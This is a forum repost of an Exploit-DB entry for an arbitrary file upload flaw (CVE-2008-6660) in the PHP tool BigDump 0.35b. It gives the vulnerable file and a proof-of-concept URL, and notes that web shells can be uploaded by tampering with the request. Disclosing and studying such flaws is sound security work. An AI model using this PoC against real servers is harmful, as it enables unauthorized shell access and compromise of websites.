Exploit BigDump 0.35b - Arbitrary File Upload

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
32479
Проверка EDB
  1. Пройдено
Автор
FELIPE ANDRIAN
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-6660
Дата публикации
2014-03-24
Код:
[+] Arbitrary Upload on BigDump v0.35b
[+] Date: 23/03/2014
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: http://www.ozerov.de/bigdump/
[+] Contact: [email protected]
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: bigdump.php
[+] Version: v0.35b
[+] Exploit : http://host/bigdump.php?start= 
[+] PoC: http://SERVER/bigdump.php?start=

Note: allows upload files and shells with tamperdate.
 
Источник
www.exploit-db.com

Похожие темы